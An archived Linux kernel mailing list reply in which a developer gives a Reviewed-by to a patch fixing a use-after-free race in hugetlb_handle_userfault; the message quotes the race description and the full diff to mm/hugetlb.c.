lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date:   Wed, 21 Sep 2022 12:31:58 -0500
From:   Sidhartha Kumar <sidhartha.kumar@...cle.com>
To:     Liu Shixin <liushixin2@...wei.com>,
        Liu Zixian <liuzixian4@...wei.com>,
        Mike Kravetz <mike.kravetz@...cle.com>,
        Muchun Song <songmuchun@...edance.com>,
        Andrew Morton <akpm@...ux-foundation.org>
Cc:     linux-mm@...ck.org, linux-kernel@...r.kernel.org,
        Kefeng Wang <wangkefeng.wang@...wei.com>
Subject: Re: [PATCH] mm: hugetlb: fix UAF in hugetlb_handle_userfault



On 9/21/22 3:34 AM, Liu Shixin wrote:
> The vma_lock and hugetlb_fault_mutex are dropped before handling
> userfault and reacquire them again after handle_userfault(), but
> reacquire the vma_lock could lead to UAF[1] due to the following
> race,
>
> hugetlb_fault
>    hugetlb_no_page
>      /*unlock vma_lock */
>      hugetlb_handle_userfault
>        handle_userfault
>          /* unlock mm->mmap_lock*/
>                                             vm_mmap_pgoff
>                                               do_mmap
>                                                 mmap_region
>                                                   munmap_vma_range
>                                                     /* clean old vma */
>          /* lock vma_lock again  <--- UAF */
>      /* unlock vma_lock */
>
> Since the vma_lock will unlock immediately after hugetlb_handle_userfault(),
> let's drop the unneeded lock and unlock in hugetlb_handle_userfault() to fix
> the issue.
>
> [1] https://lore.kernel.org/linux-mm/20220921014457.1668-1-liuzixian4@huawei.com/
> Reported-by: Liu Zixian <liuzixian4@...wei.com>
> Signed-off-by: Liu Shixin <liushixin2@...wei.com>
> Signed-off-by: Kefeng Wang <wangkefeng.wang@...wei.com>
> ---
>   mm/hugetlb.c | 30 +++++++++++-------------------
>   1 file changed, 11 insertions(+), 19 deletions(-)
>
> diff --git a/mm/hugetlb.c b/mm/hugetlb.c
> index 9b8526d27c29..5a5d466692cf 100644
> --- a/mm/hugetlb.c
> +++ b/mm/hugetlb.c
> @@ -5489,7 +5489,6 @@ static inline vm_fault_t hugetlb_handle_userfault(struct vm_area_struct *vma,
>   						  unsigned long addr,
>   						  unsigned long reason)
>   {
> -	vm_fault_t ret;
>   	u32 hash;
>   	struct vm_fault vmf = {
>   		.vma = vma,
> @@ -5508,17 +5507,12 @@ static inline vm_fault_t hugetlb_handle_userfault(struct vm_area_struct *vma,
>   
>   	/*
>   	 * vma_lock and hugetlb_fault_mutex must be
> -	 * dropped before handling userfault.  Reacquire
> -	 * after handling fault to make calling code simpler.
> +	 * dropped before handling userfault.
>   	 */
>   	hugetlb_vma_unlock_read(vma);
>   	hash = hugetlb_fault_mutex_hash(mapping, idx);
>   	mutex_unlock(&hugetlb_fault_mutex_table[hash]);
> -	ret = handle_userfault(&vmf, reason);
> -	mutex_lock(&hugetlb_fault_mutex_table[hash]);
> -	hugetlb_vma_lock_read(vma);
> -
> -	return ret;
> +	return handle_userfault(&vmf, reason);
>   }
>   
>   static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
> @@ -5537,6 +5531,7 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   	unsigned long haddr = address & huge_page_mask(h);
>   	bool new_page, new_pagecache_page = false;
>   	bool reserve_alloc = false;
> +	u32 hash = hugetlb_fault_mutex_hash(mapping, idx);
>   
>   	/*
>   	 * Currently, we are forced to kill the process in the event the
> @@ -5547,7 +5542,7 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   	if (is_vma_resv_set(vma, HPAGE_RESV_UNMAPPED)) {
>   		pr_warn_ratelimited("PID %d killed due to inadequate hugepage pool\n",
>   			   current->pid);
> -		return ret;
> +		goto out;
>   	}
>   
>   	/*
> @@ -5561,12 +5556,10 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   		if (idx >= size)
>   			goto out;
>   		/* Check for page in userfault range */
> -		if (userfaultfd_missing(vma)) {
> -			ret = hugetlb_handle_userfault(vma, mapping, idx,
> +		if (userfaultfd_missing(vma))
> +			return hugetlb_handle_userfault(vma, mapping, idx,
>   						       flags, haddr, address,
>   						       VM_UFFD_MISSING);
> -			goto out;
> -		}
>   
>   		page = alloc_huge_page(vma, haddr, 0);
>   		if (IS_ERR(page)) {
> @@ -5634,10 +5627,9 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   		if (userfaultfd_minor(vma)) {
>   			unlock_page(page);
>   			put_page(page);
> -			ret = hugetlb_handle_userfault(vma, mapping, idx,
> +			return hugetlb_handle_userfault(vma, mapping, idx,
>   						       flags, haddr, address,
>   						       VM_UFFD_MINOR);
> -			goto out;
>   		}
>   	}
>   
> @@ -5695,6 +5687,8 @@ static vm_fault_t hugetlb_no_page(struct mm_struct *mm,
>   
>   	unlock_page(page);
>   out:
> +	hugetlb_vma_unlock_read(vma);
> +	mutex_unlock(&hugetlb_fault_mutex_table[hash]);
>   	return ret;
>   
>   backout:
> @@ -5792,11 +5786,9 @@ vm_fault_t hugetlb_fault(struct mm_struct *mm, struct vm_area_struct *vma,
>   
>   	entry = huge_ptep_get(ptep);
>   	/* PTE markers should be handled the same way as none pte */
> -	if (huge_pte_none_mostly(entry)) {
> -		ret = hugetlb_no_page(mm, vma, mapping, idx, address, ptep,
> +	if (huge_pte_none_mostly(entry))
> +		return hugetlb_no_page(mm, vma, mapping, idx, address, ptep,
>   				      entry, flags);
> -		goto out_mutex;
> -	}
>   
>   	ret = 0;
>   

I've been looking at this as well.
Reviewed-by: Sidhartha Kumar <sidhartha.kumar@...cle.com>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ